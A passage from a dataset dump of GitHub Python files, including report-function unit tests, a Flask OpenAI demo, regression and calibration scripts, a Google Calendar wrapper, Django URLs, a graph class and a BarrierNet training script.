v3)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v4)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v5)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v6)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v7)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 9), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v10)\n\n def _cell_value(self, grid, row, column):\n cell = grid.get_cell(row, column)\n return cell.object.item_list[0].value\n\n def test_functions(self):\n # Conversion functions\n self.assertEqual(fn.CBool('true'), True)\n self.assertEqual(fn.CBool('t'), True)\n\n self.assertEqual(\n fn.CDate('20151231'), datetime(2015, 12, 31, 0, 0, 0))\n self.assertEqual(\n fn.CDate('20151231 23:59:59'), datetime(2015, 12, 31, 23, 59, 59))\n\n self.assertEqual(fn.CInt('1'), 1)\n self.assertEqual(fn.CInt(1.1), 1)\n\n self.assertEqual(fn.CFloat('1.1'), 1.1)\n self.assertEqual(fn.CInt(fn.CFloat('1.1')), 1)\n\n self.assertEqual(fn.CDecimal('1.1'), Decimal('1.1'))\n self.assertEqual(fn.CDecimal(1.1), Decimal(1.1))\n\n self.assertEqual(fn.CStr(1.1), '1.1')\n self.assertEqual(fn.CStr(True), 'True')\n self.assertEqual(\n fn.CStr(datetime(2015, 12, 31, 0, 0, 0)), '2015-12-31 00:00:00')\n\n # Conditional functions\n self.assertEqual(fn.Iif(True, 'a', 'b'), 'a')\n self.assertEqual(fn.Iif(False, 'a', 'b'), 'b')\n self.assertEqual(fn.Iif(None, 'a', 'b'), 'b')\n\n self.assertEqual(fn.Switch(0, 0, 'a', 1, 'b', 2, 'c'), 'a')\n self.assertEqual(fn.Switch(1, 0, 'a', 1, 'b', 2, 'c'), 'b')\n self.assertEqual(fn.Switch(2, 0, 'a', 1, 'b', 2, 'c'), 'c')\n\n self.assertEqual(fn.Choose(1, 'a', 'b', 'c'), 'a')\n self.assertEqual(fn.Choose(2, 'a', 'b', 'c'), 'b')\n self.assertEqual(fn.Choose(3, 'a', 'b', 'c'), 'c')\n\n # Date funtions\n self.assertEqual(fn.Day(datetime(2015, 12, 31, 23, 15, 49)), 31)\n self.assertEqual(fn.Month(datetime(2015, 12, 31, 23, 15, 49)), 12)\n self.assertEqual(fn.Year(datetime(2015, 12, 31, 23, 15, 49)), 2015)\n self.assertEqual(fn.Hour(datetime(2015, 12, 31, 23, 15, 49)), 23)\n self.assertEqual(fn.Minute(datetime(2015, 12, 31, 23, 15, 49)), 15)\n self.assertEqual(fn.Second(datetime(2015, 12, 31, 23, 15, 49)), 49)\n self.assertEqual(fn.Day(fn.Today()), fn.Day(datetime.today()))\n\n # String funtions\n self.assertEqual(fn.Format('Hello', 'Hello'), 'Hello')\n self.assertEqual(fn.Format('World!', 'Hello {0}'), 'Hello World!')\n self.assertEqual(fn.Format(12, '{:,.2f}'), '12.00')\n\n self.assertEqual(fn.LCase('To Lower'), 'to lower')\n self.assertEqual(fn.LCase(None), None)\n self.assertEqual(fn.UCase('To Upper'), 'TO UPPER')\n self.assertEqual(fn.UCase(None), None)\n self.assertEqual(fn.Len(''), 0)\n self.assertEqual(fn.Len('Get Lenght'), 10)\n self.assertEqual(fn.Len(None), None)\n self.assertEqual(fn.LTrim(''), '')\n self.assertEqual(fn.LTrim(' '), '')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim('LTrim '), 'LTrim ')\n self.assertEqual(fn.RTrim(''), '')\n self.assertEqual(fn.RTrim(' '), '')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim(' RTrim'), ' RTrim')\n self.assertEqual(fn.Trim(''), '')\n self.assertEqual(fn.Trim(' '), '')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n\n mid_test = 'Mid Function Demo'\n self.assertEqual(fn.Mid(mid_test, 1, 3), 'Mid')\n self.assertEqual(fn.Mid(mid_test, 14, 4), 'Demo')\n self.assertEqual(fn.Mid(mid_test, 5), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 5, 150), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 150), '')\n\n replace_test = 'abc def abc hij klm'\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx'), 'xxx def xxx hij klm')\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx', 1), 'xxx def abc hij klm')\n\n self.assertEqual(fn.String(5, 'x'), 'xxxxx')\n self.assertEqual(fn.String(0, 'x'), '')\n\n # Test functions in report\n\n report = Report(self._get_functios_xml())\n report.run()\n\n def _get_functios_xml(self):\n return r'''\n\n Functions tests\n \n \n \n \n grid_functions\n \n \n \n \n \n \n \n \n \n \n \n \n \n 5mm\n \n \n 5mm\n \n \n \n \n 5mm\n \n \n \n \n \n cbool\n =CBool('true')\n \n \n \n \n \n \n \n \n cfloat\n =CFloat('1.99')\n \n \n \n \n \n \n \n \n \n \n \n\n'''\n","repo_name":"formateli/nuntiare","sub_path":"tests/unittest/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":15683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72991219527","text":"'''\nCreate a flask app that has a textbox and a button. When the button is clicked, the text in the textbox is sent to the OpenAI API and the response is displayed on the page.\n'''\nfrom flask import Flask, render_template, request\nfrom gpt import GPT, Example\nimport openai\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n prompt = request.form['prompt']\n openai.api_key = \"\"\n gpt = GPT(engine=\"davinci\", temperature=0.5, max_tokens=100)\n output = gpt.submit_request(prompt)\n return render_template('index.html', output=output.choices[0].text)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Tominium/GPT3-Sandbox","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"21359318333","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 1 13:36:23 2022\r\n\r\n@author: ramav\r\n\"\"\"\r\n#SIMPLE LINEAR REGREESSION\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\ndf.isnull().sum()\r\n\r\n\r\nx = df.iloc[:,:1].values\r\ny = df.iloc[:,-1].values\r\n\r\n#EDA\r\nplt.scatter(x, y, color=\"red\")\r\nplt.title(\" relation between salary and experience\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nplt.boxplot(x)\r\nplt.show()\r\nplt.hist(x)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.25,random_state=0)\r\nx_train.shape\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train, y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\nLR.intercept_.round(3) #Bo\r\nLR.coef_.round(3) #B1\r\n\r\n\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_test = LR.predict(x_test)\r\n\r\ny_pred_train\r\ny_pred_test\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y_train,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_train,y_pred_train).round(2)*100) #96\r\n\r\n\r\nmse1 = mean_squared_error(y_test,y_pred_test)\r\nRMSE1= np.sqrt(mse1)\r\nprint(\"Root mean square :\", RMSE1.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_test,y_pred_test).round(2)*100)\r\n\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_train,y_pred_train,color=\"red\")\r\nplt.title(\"training scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_test,y_pred_test,color=\"red\")\r\nplt.title(\"test scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\n# x and y variable\r\nx = df[\"YearsExperience\"]\r\ny = df[\"Salary\"]\r\n\r\n\r\n#split as train and test\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.30,random_state=42)\r\n\r\nx_train.shape\r\n\r\n#scatter plot between x and y\r\ndf.plot(kind=\"scatter\",x=\"YearsExperience\",y=\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x,y,color=\"red\",edgecolors=\"orange\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#box plot to know outliers\r\ndf.plot(kind=\"box\")\r\nplt.show()\r\n\r\ndf.corr()\r\n\r\n# Dataframe\r\nx_train = pd.DataFrame(x_train)\r\ny_train= pd.DataFrame(y_test)\r\n\r\nx_ test= pd.DataFrame(x_test)\r\ny_test= pd.DataFrame(y_test)\r\n\r\n\r\n\r\n# model fitting\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train,y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\n\r\nLR.intercept_.round(3)\r\nLR.coef_.round(3)\r\n\r\nLR.score(x,y).round(3)\r\n\r\n#prediction\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_train\r\n\r\ny_pred_test = LR.predict(x_test)\r\ny_pred_test\r\n\r\n#comparsion between y actual and y_pred by using scatter plot\r\nplt.scatter(x=x.iloc[:,0],y=y,color=\"red\")\r\nplt.plot(x.iloc[:,0], y_pred_train,color=\"blue\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"salary\")\r\nplt.show()\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2))\r\n\r\nprint(\"R square:\",r2_score(y,y_pred).round(2)*100)\r\n\r\n'''\r\n","repo_name":"ajithsinghr/Build-a-prediction-model-for-salary-hike-Simple-linear-regression","sub_path":"solved Sal_data.py","file_name":"solved Sal_data.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5109464108","text":"class Solution(object):\n def anagramMappings(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: List[int]\n :rtype: List[int]\n \"\"\"\n dic = {}\n \n for i,n in enumerate(B):\n dic.setdefault(n, []).append(i)\n \n \n return [dic.get(n).pop(0) for n in A]\n","repo_name":"simonzg/leetcode-solutions","sub_path":"760.Find_Anagram_Mappings.py","file_name":"760.Find_Anagram_Mappings.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20984391504","text":"# Python3\n# Create date: 2023-06-15\n# Author: Scc_hy\n# Func: 保序回归\n# ==============================================================================================\n\n# calibration_curve PLOT\n# -------------------------------\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.calibration import calibration_curve\nnp.random.seed(2023)\n\n\ny_true = np.random.randint(0, 2, size=1000)\ny_pred = np.random.binomial(n=200, p=0.19, size=1000)\ny_pred = (y_pred - y_pred.min())/(y_pred.max()-y_pred.min())\ny_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n)\n\n# 分割图片 2:1\nfig = plt.figure(constrained_layout=True, figsize=(16, 4))\ngs = fig.add_gridspec(1, 3)\naxes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n# 绘制分布\nsns.histplot(y_pred, alpha=0.7, ax=axes1)\nfor i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\naxes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\naxes1.set_xlabel('Predicted probability')\n# 绘制对准曲线\naxes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\naxes2.plot(proba_means, y_means, linestyle='-.')\naxes2.set_title('Simplr Predict Calibrator')\naxes2.legend()\naxes2.set_xlabel(\"Bin's mean of predicted probability\")\naxes2.set_ylabel(\"Bin's mean of target variable\")\nplt.show()\n\n\ndef quick_calibration_plot(y_true, y_pred, title_msg=''):\n y_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n )\n # 分割图片 2:1\n fig = plt.figure(constrained_layout=True, figsize=(16, 4))\n gs = fig.add_gridspec(1, 3)\n axes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n # 绘制分布\n sns.histplot(y_pred, alpha=0.7, ax=axes1)\n for i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\n axes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\n axes1.set_xlabel('Predicted probability')\n # 绘制对准曲线\n axes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\n axes2.plot(proba_means, y_means, linestyle='-.')\n axes2.set_title(f'Simple Predict Calibrator\\n{title_msg}')\n axes2.legend()\n axes2.set_xlabel(\"Bin's mean of predicted probability\")\n axes2.set_ylabel(\"Bin's mean of target variable\")\n plt.show()\n \n\n# 校准试验\n# -------------------------------\ndef expected_calibration_error(y, proba, bins = 'fd'):\n bin_count, bin_edges = np.histogram(proba, bins = bins)\n n_bins = len(bin_count)\n bin_edges[0] -= 1e-8 # because left edge is not included\n bin_id = np.digitize(proba, bin_edges, right = True) - 1\n bin_ysum = np.bincount(bin_id, weights = y, minlength = n_bins)\n bin_probasum = np.bincount(bin_id, weights = proba, minlength = n_bins)\n bin_ymean = np.divide(bin_ysum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n bin_probamean = np.divide(bin_probasum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n ece = np.abs((bin_probamean - bin_ymean) * bin_count).sum() / len(proba)\n return ece\n\n\n# 模型简单拟合\nfrom sklearn.datasets import make_classification\nfrom sklearn.isotonic import IsotonicRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nX, y = make_classification(\n n_samples = 15000, \n n_features = 50, \n n_informative = 30, \n n_redundant = 20,\n weights = [.9, .1],\n random_state = 0\n)\nX_train, X_valid, X_test = X[:5000], X[5000:10000], X[10000:]\ny_train, y_valid, y_test = y[:5000], y[5000:10000], y[10000:]\nforest = RandomForestClassifier().fit(X_train, y_train)\nproba_valid = forest.predict_proba(X_valid)[:, 1]\n\n# 保序回归\niso_reg = IsotonicRegression(y_min = 0, y_max = 1, out_of_bounds = 'clip').fit(proba_valid, y_valid)\ntest_pred = forest.predict_proba(X_test)[:, 1]\nece_org = expected_calibration_error(y_test, test_pred, bins = 'fd')\nquick_calibration_plot(y_test, test_pred, title_msg=f'not calibration ECE={ece_org:.3f}')\n\nproba_test_forest_isoreg = iso_reg.predict(test_pred)\nece_iosreg = expected_calibration_error(y_test, proba_test_forest_isoreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_isoreg, title_msg=f'IsotonicRegression ECE={ece_iosreg:.3f}')\n\n# logistic\nlog_reg = LogisticRegression().fit(proba_valid.reshape(-1, 1), y_valid)\nproba_test_forest_logreg = log_reg.predict_proba(test_pred.reshape(-1, 1))[:, 1]\n\nece_logreg = expected_calibration_error(y_test, proba_test_forest_logreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_logreg, title_msg=f'IsotonicRegression ECE={ece_logreg:.3f}')","repo_name":"scchy/CSDN","sub_path":"保序回归New.py","file_name":"保序回归New.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24851150742","text":"# for 문\n# 1. 형식\n# for 변수 in 반복객체:\n# 반복실행문\n# 2. 반복객체\n# 리스트, 튜플, 세트, 사전, 문자열, 정수집합(range)\n# 3. 정수집합(range)\n# 1) range(10) : 0 ~ 9\n# 2) range(1, 10) : 1 ~ 9\n# 3) range(1, 10, 2) : 1, 3, 5, 7, 9\n\nfor a in [1, 2, 3]:\n print(a)\n\nfor b in (1, 2, 3):\n print(b)\n\nfor c in 'Hello':\n print(c)\n\nfor d in range(10):\n print(d)\n\nmy_list = [1, 2, 3, 4, 5]\nfor idx in range(len(my_list)):\n print(my_list[idx])\n\n# 이름 따로, 나이 따로 출력\nmy_list = [('에밀리', 20), ('제임스', 25)]\nfor person in my_list:\n for p in person:\n print(p)\n","repo_name":"hwangseokjin94/gitstudy","sub_path":"pythonstudy/workspace/day02/EX12_for.py","file_name":"EX12_for.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39014700329","text":"from src.schemas.response import HTTPResponses, HttpResponseModel\nfrom src.schemas.album import AlbumCreateModel\nfrom src.db.__init__ import database as db\nfrom src.service.impl.song_service import SongService\nfrom src.service.impl.album_service import AlbumService\n\n\nclass FiltersService:\n\n @staticmethod\n def get_filters(name: str = None, year: int = None, genre: str = None):\n albums_titles = set()\n songs_titles = set()\n\n if name:\n res1 = AlbumService.get_album_by_name(name)\n res2 = SongService.get_songs_by_name(name)\n res3 = SongService.get_by_artist(name)\n res4 = AlbumService.get_by_artist(name)\n\n if res1 is None:\n res1 = []\n if res2 is None:\n res2 = []\n if res3 is None:\n res3 = []\n if type(res1) is dict:\n res1 = [res1]\n if type(res2) is dict:\n res2 = [res2]\n if type(res3) is dict:\n res3 = [res3]\n\n albums_titles |= {album['id'] for album in res1}\n\n albums_titles |= {album['id'] for album in res4}\n\n songs_titles |= {song['id']\n for song in res2}\n songs_titles |= {song['id']\n for song in res3}\n if year:\n\n res1 = AlbumService.get_by_year(year)[\n 'songs']\n res2 = SongService.get_by_year(year)[\n 'songs']\n\n albums_by_year_titles = {album['id'] for album in res1}\n songs_by_year_titles = {song['id'] for song in res2}\n\n # print(albums_by_year_titles)\n # print(songs_by_year_titles)\n\n # Se o nome for fornecido, fazemos a interseção com os álbuns filtrados por nome\n if name:\n albums_titles &= albums_by_year_titles\n songs_titles &= songs_by_year_titles\n\n else:\n albums_titles = albums_by_year_titles\n songs_titles = songs_by_year_titles\n\n if genre:\n print(\"procurando por genero\")\n\n res1 = AlbumService.get_by_genre(genre)['songs']\n res2 = SongService.get_by_genre(genre)['songs']\n\n albums_by_genre_titles = {\n album['id'] for album in res1}\n songs_by_genre_titles = {song['id']\n for song in res2}\n\n # Se o nome ou ano forem fornecidos, fazemos a interseção com os álbuns já filtrados\n if name or year:\n albums_titles &= albums_by_genre_titles\n songs_titles &= songs_by_genre_titles\n\n else:\n albums_titles = albums_by_genre_titles\n songs_titles = songs_by_genre_titles\n\n # Obtendo os álbuns e músicas completos com os títulos filtrados\n all_albums = AlbumService.get_albums()\n all_songs = SongService.get_songs()\n\n albums = [album for album in all_albums if album['id'] in albums_titles]\n songs = [song for song in all_songs if song['id'] in songs_titles]\n\n # delete the id key from the response\n # for album in albums:\n # del album['id']\n # for song in songs:\n # del song['id']\n\n response = {\n 'albums': albums,\n 'songs': songs,\n }\n\n return response\n","repo_name":"lumendesp/groove-app","sub_path":"backend/src/service/impl/search_service.py","file_name":"search_service.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"40373142172","text":"#!/usr/bin/env python3\n\nimport os\nimport pickle\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\n\nSCOPES = [\n \"https://www.googleapis.com/auth/calendar\",\n \"https://www.googleapis.com/auth/calendar.readonly\",\n]\nCREDENTIALS_FILE = \".gcal.credentials.json\"\nTOKEN_FILE = \".gcal.token.json\"\n\n\nclass GCal:\n def __init__(self):\n self.service = self.make_calendar_service()\n self.workflowy_calendar_id = self.get_calendar_id(\"workflowy\")\n\n def make_calendar_service(self):\n creds = None\n if os.path.exists(TOKEN_FILE):\n creds = Credentials.from_authorized_user_file(TOKEN_FILE, SCOPES)\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS_FILE, SCOPES\n )\n creds = flow.run_local_server(port=0)\n with open(TOKEN_FILE, \"w\") as token:\n token.write(creds.to_json())\n return build(\"calendar\", \"v3\", credentials=creds)\n\n def get_calendar_id(self, calendar_name):\n calendar_list = self.service.calendarList().list(pageToken=None).execute()\n for calendar_list_entry in calendar_list[\"items\"]:\n if calendar_list_entry[\"summary\"] == \"workflowy\":\n return calendar_list_entry[\"id\"]\n raise Exception(\"workflowy calendar not found\")\n\n def get_events(self):\n events_result = (\n self.service.events()\n .list(calendarId=self.workflowy_calendar_id, maxResults=10)\n .execute()\n )\n return events_result.get(\"items\", [])\n\n def get_event(self, uuid):\n uuid = uuid.replace(\"-\", \"\")\n try:\n return (\n self.service.events()\n .get(calendarId=self.workflowy_calendar_id, eventId=uuid)\n .execute()\n )\n except:\n return None\n\n def insert_event(self, uuid, summary, start, end):\n print(f\"inserting event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().insert(\n calendarId=self.workflowy_calendar_id, body=event\n ).execute()\n # print(f\"Event created: {event.get('htmlLink')}\")\n\n def update_event(self, uuid, summary, start, end):\n print(f\"update event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().update(\n calendarId=self.workflowy_calendar_id, eventId=uuid, body=event\n ).execute()\n","repo_name":"nhardt/workflowy-to-google-calendar","sub_path":"lib/GCal.py","file_name":"GCal.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13800480195","text":"from chapter1.Bag import Bag\n\n\nclass EdgeWeightedGraph:\n def __init__(self, V):\n \"\"\"\n Args:\n V: int, 顶点总数\n \"\"\"\n self.V = V\n self.E = 0\n self.adj = [Bag() for _ in range(V)]\n\n def add_edge(self, e):\n \"\"\"\n Args:\n e: Edge\n \"\"\"\n v = e.either()\n w = e.other(v)\n self.adj[v].add(e)\n self.adj[w].add(e)\n self.E += 1\n\n def edges(self):\n \"\"\"\n Return:\n Iterable\n \"\"\"\n b = Bag()\n for v in range(self.V):\n for e in self.adj[v]:\n if e.other(v) > v:\n b.add(e)\n return b ","repo_name":"AiZhanghan/Algorithms-Fourth-Edition","sub_path":"code/chapter4/EdgeWeightedGraph.py","file_name":"EdgeWeightedGraph.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1998341823","text":"from django.conf.urls import patterns, url, include\nfrom django.views.generic import TemplateView\n\nurlpatterns=patterns('home.views',\n #HOME\n url(r'^$','index_view', name='vista_principal'),\n #estaticos\n url(r'^humans.txt$', TemplateView.as_view(template_name='statics/humans.txt', content_type='text/plain; charset=utf-8')),\n url(r'^robots.txt$', TemplateView.as_view(template_name='statics/robots.txt', content_type='text/plain; charset=utf-8')),\n url(r'^sitemap.xml$', TemplateView.as_view(template_name='statics/sitemap.xml', content_type='application/xml; charset=utf-8')),\n #secciones\n url(r'^lo-que-hacemos/$', 'loqueHacemos'),\n url(r'^lo-que-hacemos/ux-ui-design/$', 'uxDesign'),\n url(r'^lo-que-hacemos/ecommerce/$', 'eCommerce'),\n url(r'^lo-que-hacemos/websites/$', 'webSites'),\n url(r'^lo-que-hacemos/marketing-online/$', 'marketingOnline'),\n url(r'^lo-que-hacemos/aplicaciones-web/$', 'appWeb'),\n #secciones\n url(r'^nuestro-trabajo/$', 'portafolio'),\n url(r'^contacto/$', 'contacto'),\n url(r'^about-us/$', 'aboutUS'),\n url(r'^expo-guadalajara/$', 'landing'),\n\n #Equipo y sus paginas.\n url(r'^team/$', 'team'),\n url(r'^alen/$', 'alen'),\n url(r'^jesus/$', 'chucho'),\n url(r'^luciano/$', 'luciano'),\n #REDirects\n url(r'^blog/$', 'blogRedirect'),\n url(r'^facebook/$', 'facebookRedirect'),\n url(r'^twitter/$', 'twitterRedirect'),\n url(r'^g\\+/$', 'gplusRedirect'),\n url(r'^map/$', 'blogRedirect'),\n url(r'^fcq/$', 'blogRedirect'),\n\n)","repo_name":"xtornasol512/phyro","sub_path":"back-end/phyro/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3689181864","text":"import torch\nimport torch.nn as nn\nfrom my_classes import Dataset_list as Dataset\nimport scipy.io as sio\nimport models\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nplt.style.use('bmh')\n\nbarriernet = 1\n\n# CUDA for PyTorch\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint(\"Using {} device\".format(device))\ntorch.backends.cudnn.benchmark = True\n\n\n# Datasets from mat\ntrain_data = sio.loadmat('data/data_train_ocbf.mat')\ntrain_data = train_data['data_train_ocbf'] # data_train for oc controller\ntest_data = sio.loadmat('data/data_test_ocbf.mat')\ntest_data = test_data['data_test_ocbf'] # data_test for oc controller\nimpl_data = sio.loadmat('data/data_ip.mat')\nimpl_data = impl_data['data_ip']\n\ntrain0 = np.float32(train_data[:,0:4]) # x_ip, v_ip, x_i, v_i\ntrain_labels = np.reshape(np.float32(train_data[:,4]), (len(train_data),1))\ntest0 = np.float32(test_data[:,0:4])\ntest_labels = np.reshape(np.float32(test_data[:,4]), (len(test_data),1))\nimpl0 = np.float32(impl_data)\ninit = train0[0]\n\n# data normalization\nmean = np.mean(train0, axis = 0)\nstd= np.std(train0, axis = 0)\ntrain0 = (train0 - mean)/std\ntest0 = (test0 - mean)/std\nimpl0 = (impl0 - mean)/std\n\n\n# Parameters\nparams = {'batch_size': 32,\n 'shuffle': True,\n 'num_workers': 12}\n\n# Generators\ntraining_set = Dataset(train0, train_labels)\ntrain_dataloader = torch.utils.data.DataLoader(training_set, **params)\n\ntest_set = Dataset(test0, test_labels)\ntest_dataloader = torch.utils.data.DataLoader(test_set, **params)\n\n\n# Initialize the model.\nnFeatures, nHidden1, nHidden21, nHidden22, nCls = 4, 72, 24, 24, 1\nif (barriernet == 1):\n model = models.BarrierNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nelse:\n model = models.FCNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nprint(model)\n\n# Initialize the optimizer.\nlearning_rate = 1e-3\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) #Adam\nloss_fn = nn.MSELoss()\n\n\ndef train(dataloader, model, loss_fn, optimizer, losses):\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n \n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n losses.append(loss.item())\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 25 == 0:\n loss, current = loss.item(), batch * 